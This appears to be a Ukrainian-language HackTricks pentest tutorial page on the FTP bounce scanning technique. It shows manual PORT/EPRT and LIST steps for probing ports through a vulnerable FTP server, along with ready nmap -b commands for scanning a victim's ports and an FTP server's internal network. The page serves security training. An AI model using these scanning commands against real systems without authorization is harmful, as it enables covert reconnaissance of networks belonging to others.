37 lines
1.8 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# FTP Bounce attack - Scan
{{#include ../../banners/hacktricks-training.md}}
## FTP Bounce - Сканування
### Вручну
1. Підключіться до вразливого FTP
2. Використовуйте **`PORT`** або **`EPRT`** (але тільки один з них), щоб встановити з'єднання з _\<IP:Port>_, який ви хочете просканувати:
`PORT 172,32,80,80,0,8080`\
`EPRT |2|172.32.80.80|8080|`
3. Використовуйте **`LIST`** (це просто надішле до підключеного _\<IP:Port>_ список поточних файлів у папці FTP) і перевірте можливі відповіді: `150 File status okay` (Це означає, що порт відкритий) або `425 No connection established` (Це означає, що порт закритий)
1. Замість `LIST` ви також можете використовувати **`RETR /file/in/ftp`** і шукати подібні відповіді `Open/Close`.
Приклад використання **PORT** (порт 8080 172.32.80.80 відкритий, а порт 7777 закритий):
![](<../../images/image (241).png>)
Той же приклад, використовуючи **`EPRT`** (автентифікацію пропущено на зображенні):
![](<../../images/image (539).png>)
Відкритий порт, використовуючи `EPRT` замість `LIST` (інше середовище)
![](<../../images/image (875).png>)
### **nmap**
```bash
nmap -b <name>:<pass>@<ftp_server> <victim>
nmap -Pn -v -p 21,80 -b ftp:ftp@10.2.1.5 127.0.0.1 #Scan ports 21,80 of the FTP
nmap -v -p 21,22,445,80,443 -b ftp:ftp@10.2.1.5 192.168.0.1/24 #Scan the internal network (of the FTP) ports 21,22,445,80,443
```
{{#include ../../banners/hacktricks-training.md}}